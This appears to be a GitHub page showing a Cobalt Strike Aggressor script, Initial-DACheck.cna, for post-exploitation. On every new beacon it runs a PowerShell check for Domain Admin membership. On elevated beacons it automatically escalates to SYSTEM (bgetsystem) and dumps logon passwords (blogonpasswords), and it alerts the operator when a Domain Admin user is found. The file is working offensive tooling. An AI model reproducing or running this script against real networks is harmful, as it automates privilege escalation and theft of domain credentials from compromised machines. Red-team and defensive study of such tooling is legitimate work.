-
Notifications
You must be signed in to change notification settings - Fork 40
/
Initial-DACheck.cna
49 lines (42 loc) · 1.37 KB
/
Initial-DACheck.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# quickly run powershellimport
sub powershellimport {
bpowershell_import($1, script_resource("Invoke-DACheck.ps1"));
}
alias checkda {
powershellimport($1);
bpowershell($1, 'Invoke-DACheck');
}
# register the GetDa command
beacon_command_register(
"checkda",
"Checks if the current user is in the DA Group",
"Synopsis: echo [no arguments]\n\nChecks using Powershell that supports (2.0 or later with 3.5 .NET) \n or (PS 4.0 or later) to perform Domain Group queries.");
# set up the Initial check
on beacon_initial {
powershellimport($1);
bpowershell($1, 'Invoke-DACheck -Initial True');
$a = binfo($1, "user");
$b = "*";
if ($b isin $a)
{
bgetsystem($1);
blogonpasswords($1);
}
}
#NEED TO SETUP A CHECK ARRAY FOR PAST DA FINDS
# set up event consumer to search for specfic pattern
# if found alert them via Elog and box
on beacon_output {
$s = replace($2, 'received output:\n'.'');
# println($s);
$f = "[!] Found-DA-User:";
if ($f isin $s)
{
$pid = binfo($1, "pid");
elog("Found DA User at Pid: $pid");
show_message("Found DA User at Pid: $pid");
beacon_note($1, "DA User on this box");
}
}
# bpowershell($1, '$user = [Security.Principal.WindowsIdentity]::GetCurrent();(New-Object Security.Principal.
# WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)');